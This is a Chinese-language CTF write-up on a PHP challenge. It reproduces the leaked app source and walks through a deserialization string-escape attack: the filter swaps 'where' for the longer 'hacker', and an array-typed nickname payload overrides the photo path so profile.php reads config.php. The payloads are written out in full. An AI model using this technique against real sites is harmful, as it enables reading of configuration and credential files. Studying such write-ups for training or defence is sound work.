一直没写过php反序列化的文章。今天颇有兴致,分享思路。
经过dirsearch,发现www.zip源码泄露,分析源码(再此之前尝试了其他漏洞,最后才扫描,shit)。
php
//config.php
<?php
$config['hostname'] = '127.0.0.1';
$config['username'] = 'root';
$config['password'] = '';
$config['database'] = '';
$flag = '';
?>
php
//index.php
<?php
require_once('class.php');
if($_SESSION['username']) {
header('Location: profile.php');
exit;
}
if($_POST['username'] && $_POST['password']) {
$username = $_POST['username'];
$password = $_POST['password'];
if(strlen($username) < 3 or strlen($username) > 16)
die('Invalid user name');
if(strlen($password) < 3 or strlen($password) > 16)
die('Invalid password');
if($user->login($username, $password)) {
$_SESSION['username'] = $username;
header('Location: profile.php');
exit;
}
else {
die('Invalid user name or password');
}
}
else {
?>
php
//register.php
<?php
require_once('class.php');
if($_POST['username'] && $_POST['password']) {
$username = $_POST['username'];
$password = $_POST['password'];
if(strlen($username) < 3 or strlen($username) > 16)
die('Invalid user name');
if(strlen($password) < 3 or strlen($password) > 16)
die('Invalid password');
if(!$user->is_exists($username)) {
$user->register($username, $password);
echo 'Register OK!<a href="index.php">Please Login</a>';
}
else {
die('User name Already Exists');
}
}
else {
?>config.php是数据库配置文件,并且我们的flag就在这里。index.php是登录文件,并限制了用户名及密码长度。register.php是注册文件,也限制了长度。这三个文件不重要。请看接下来三个。
php
//class.php
<?php
require('config.php');
class user extends mysql{
private $table = 'users';
public function is_exists($username) {
$username = parent::filter($username);
$where = "username = '$username'";
return parent::select($this->table, $where);
}
public function register($username, $password) {
$username = parent::filter($username);
$password = parent::filter($password);
$key_list = Array('username', 'password');
$value_list = Array($username, md5($password));
return parent::insert($this->table, $key_list, $value_list);
}
public function login($username, $password) {
$username = parent::filter($username);
$password = parent::filter($password);
$where = "username = '$username'";
$object = parent::select($this->table, $where);
if ($object && $object->password === md5($password)) {
return true;
} else {
return false;
}
}
public function show_profile($username) {
$username = parent::filter($username);
$where = "username = '$username'";
$object = parent::select($this->table, $where);
return $object->profile;
}
public function update_profile($username, $new_profile) {
$username = parent::filter($username);
$new_profile = parent::filter($new_profile);
$where = "username = '$username'";
return parent::update($this->table, 'profile', $new_profile, $where);
}
public function __tostring() {
return __class__;
}
}
class mysql {
private $link = null;
public function connect($config) {
$this->link = mysql_connect(
$config['hostname'],
$config['username'],
$config['password']
);
mysql_select_db($config['database']);
mysql_query("SET sql_mode='strict_all_tables'");
return $this->link;
}
public function select($table, $where, $ret = '*') {
$sql = "SELECT $ret FROM $table WHERE $where";
$result = mysql_query($sql, $this->link);
return mysql_fetch_object($result);
}
public function insert($table, $key_list, $value_list) {
$key = implode(',', $key_list);
$value = '\'' . implode('\',\'', $value_list) . '\'';
$sql = "INSERT INTO $table ($key) VALUES ($value)";
return mysql_query($sql);
}
public function update($table, $key, $value, $where) {
$sql = "UPDATE $table SET $key = '$value' WHERE $where";
return mysql_query($sql);
}
public function filter($string) {
$escape = array('\'', '\\\\');
$escape = '/' . implode('|', $escape) . '/';
$string = preg_replace($escape, '_', $string);
$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
return preg_replace($safe, 'hacker', $string);
}
public function __tostring() {
return __class__;
}
}
session_start();
$user = new user();
$user->connect($config);class.php里定义了增查改三个数据库操作逻辑以及一个filter过滤函数。过滤函数会将select,insert,where等替换成hacker。然后在更新个人信息(update_profile)以及查询个人信息(show_profile)的函数里引用filter。继续往下看。
php
//update.php
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
$username = $_SESSION['username'];
if(!preg_match('/^\d{11}$/', $_POST['phone']))
die('Invalid phone');
if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
die('Invalid email');
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
$file = $_FILES['photo'];
if($file['size'] < 5 or $file['size'] > 1000000)
die('Photo size error');
move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
$user->update_profile($username, serialize($profile));
echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
}
else {
?>在update.php里进行了更新信息并且长度限制,然后进行了序列化。
php
//profile.php
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
$username = $_SESSION['username'];
$profile=$user->show_profile($username);
if($profile == null) {
header('Location: update.php');
}
else {
$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));
?>在profile.php里查询信息,然后反序列化。photo会去利用file_get_content函数读内容并base64编码。逻辑大概就清晰了,我们需要在update.php里插入payload,然后利用反序列化覆盖photo为config.php就能拿到flag。这里就要使用到反序列字符串逃逸。由于phone,email有严格的正则匹配,nickname只限制了字母与数字,还有长度。所以nickname就是构造点。我们先看一下正常的学序列化
php
//<?php
//$profile['phone'] = '11111111111';
//$profile['email'] = '1111111111@qq.com';
//$profile['nickname'] = 'where';
//$profile['photo'] = 'config.php';
//echo serialize($profile);
输出结果a:4:{s:5:"phone";s:11:"11111111111";s:5:"email";s:17:"1111111111@qq.com";s:8:"nickname";s:5:"where";s:5:"photo";s:10:"config.php";}
截取nickname后";s:5:"photo";s:10:"config.php";} 这一段就是需要逃逸的字符,一共33个,并覆盖原有的md5逻辑
在filter里,where会被替换成hacker,写一个where,最后的结果会这样
{s:5:"phone";s:11:"11111111111";s:5:"email";s:17:"1111111111@qq.com";s:8:"nickname";s:5:"hacker";s:5:"photo";s:10:"config.php";}
hacker长度是6。s:5:"hacker";就只能解析到hacke。字符r就解析不到,成功逃逸。所以现在写33个where,就会造成33个字符逃逸。
php
<?php
$profile['phone'] = '11111111111';
$profile['email'] = '1111111111@qq.com';
$profile['nickname'] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";s:5:"photo";s:10:"config.php";}';
$profile['photo'] = 'config.php';
$a=serialize($profile);
$b=preg_replace('/where/','hacker',$a);
echo $b;结果就会这样
a:4:{s:5:"phone";s:11:"11111111111";s:5:"email";s:17:"1111111111@qq.com";s:8:"nickname";s:198:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:5:"photo";s:10:"config.php";}";s:5:"photo";s:10:"config.php";}
33个hacker长度刚好198,";s:5:"photo";s:10:"config.php";}成功逃逸并执行。
但是nickname有长度限制,这里传入数组就可以绕过了
php
strcmp(Array(), "abc") = null
strpos(Array(),"abc") = null
strlen(Array()) = null但是如果我们传入数组,对比下序列化后的差异
php
<?php
$profile['phone'] = '11111111111';
$profile['email'] = '1111111111@qq.com';
$profile['nickname']=array('wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";s:5:"photo";s:10:"config.php";}');
$profile['photo'] = 'config.php';
$a=serialize($profile);
echo $a;结果是a:4:{s:5:"phone";s:11:"11111111111";s:5:"email";s:17:"1111111111@qq.com";s:8:"nickname";a:1:{i:0;s:203:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:10:"config.php";}
这个数组反序列化会加上{}。最后需要手动添加'}',进行闭合,所以真正需要逃逸的是34个字符,payload需要写34个where
a:4:{s:5:"phone";s:11:"11111111111";s:5:"email";s:17:"1111111111@qq.com";s:8:"nickname";a:1:{i:0;s:203:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:10:"config.php";}
**";}s:5:"photo";s:10:"config.php";}**就是需要逃逸的字符。
最后nickname\[\]:wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}
最后访问profile.php,拿到config.php的base64编码,解码即可。文章若是有不对,请多指正。
